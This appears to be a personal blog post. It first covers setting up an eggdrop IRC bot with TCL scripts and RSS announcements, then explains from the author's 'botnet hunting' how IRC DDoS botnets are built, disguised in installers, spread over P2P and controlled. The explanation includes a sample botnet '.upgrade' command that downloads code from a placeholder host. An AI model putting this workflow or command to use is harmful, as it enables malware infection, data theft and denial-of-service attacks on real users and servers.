Dropping Eggs

So last night, while doing nothing, I decided to full around with eggdrop irc bots. I specifically used Windrop to run on my desktop for easy testing and whatnot, but one day I hope to toss this thing on a nix shell and get it off a personal pc.

The config file was daunting. This wasn’t the first time I made one of these bots, but since I had originally, the config base file has been altered somewhat, and is far more complex. After I partly configured it, there was the problems of commenting out all the kill commands that were put in it to make sure you went through the entire file thoroughly. Needless to say, I didn’t, and probably wasted more time looking for those damn lines then it would have taken to just read the entire thing. Then there was the problem that the bot worked, but it would flip out when opped and do crazy things to the channel and people. I couldn’t fix this without reinstalling the bot, and the torment continued.

After maybe seven re-edits, the thing became stable enough to op, and utilized some key features. TCL scripts add so much functionality to these bots I wonder why anyone would use them for anything else. I mean, I can see these bots back in the day used in place for various services, but now, they are just kinda knick-knacks. TCL scripts allow regular programmers to go off and create bot code without modifying any key files. These scripts are add-ons, or modules if you will.

So now, I have all these scripts on the bot. Weather, horoscopes, seen commands, etc. It all functions well, six hours after starting. The possibly best feature I integrated into this bot is the ability to read RSS. I now have a use for these feeds I have been compiling. The beauty is, the bot will check the forums, and the rest of the site every half an hour, If something in the feed is new, the bot will announce it to the channel. Refreshing the pages waiting to see updates becomes obsolete.



So a little bit ago, must have been last year judging now, I was into what some call “Botnet Hunting”. As in, I would go and search for active malicious botnets, pretend to be a bot, connect, and wait out on the server to see what was going on and what information I could gather.

To understand what I was doing, there is first the concept of what a botnet is and consists of. I will specifically be talking of DDoS botnets. Every botnet starts with a person, or botnet herder. The bot herder starts by setting up an IRC server. IRC is an acronym for Internet Relay Chat, a fairly common messaging protocol based around chat on servers, and networks of servers (Such as the elcycle chat). Think chatrooms, but with much more control and capability. So, the bot herder sets up a server and configures it to not be picked up by any IRC indexing services that could expose the server to the general public in any way. Once the server is setup, the bot herder acquires a (usually free) DNS mask. The DNS mask will take the server’s Ip (internet protocol) address and give it something similar to a domain name for connection. Free ones are usually chosen from services such as No-Ip or DynDNS and are used in a temporary fashion. Nothing of the bot herder’s personal information is left with the service, because they are free.

Next, the bot herder works on the bot code. Commonly, sources are taken and modified to the herder’s liking, but sometimes these bot codes are made from scratch. Common bot scripts are created and compiled in C++ though I have seen some in other languages. The purpose of this code is to connect the victim’s machine to the irc server the bot herder had set up, and assign it a nickname based on the OS of the infected computer, as well as a number (Either random or based on the victim’s location, for example a bot nick could be “XP|73590257”). This bot code is very lightweight, designed to hide from anti-virus programs, set to run every time the computer restarts, and embedded into the registry. It would not be a surprise if you had one of these bots infecting you with no knowledge.

After the bot code is compiled into an executable ( a .exe file). The malicious file is then usually bound to another legit executable. For example, this bot file could be hidden within a Firefox installer and be launched covertly when you try to install firefox. Because of the design, you would be unaware the bot code was even being run. The binders that combine the executables are also easily found and used. Some of the programs that bot herders use come with Windows distros and are expected to be used to make install packages for mass updates.

The hardest step is distribution of the infected file. Thankfully, there are many unintelligent internet users who will blindly download and install anything as long as they think it will do what they desire. Consider releasing this application on a P2P network (Limewire, Kazaa) with a bogus name and having victims willingly download.

Once they download and run the file, that’s all it takes. The bot infects the computer, hides itself, covers its tracks, and then connects to the IRC server. Sometimes, these bots are a bit more sophisticated and can contain a RAT (Remote Access Trojan). This bot herder could gain full control of the victim’s machine, and take things like stored internet logs and credit card numbers, as well as send a copy of itself to everyone in the computer’s email address book.

Once on the IRC server, the bot joins a channel (room) and waits. The bot herder then goes to this room whenever he/she pleases and takes controls of the bots using several commands (these commands usually start with a period, for example “.upgrade http://xxxxx.com/botupdatefilename.xxx”). The main purpose of these bots is Distributed Denial of Service attacks on servers. The bot herder will issue a command to all the bots and tell them to all ping a single server. The amount of ping the server gets is too great, and causes the server to lock up and go offline. The more bots there are, the quicker this will happen. Some botnets have been found to have populations in the area of hundreds of thousands and could render a server useless quickly.

The bot herder does not always restrict this botnet to self-use, and can offer services to other groups in exchange for information, stolen passwords, money, etc. Botnets have also been used recently against various websites that deal with scientology.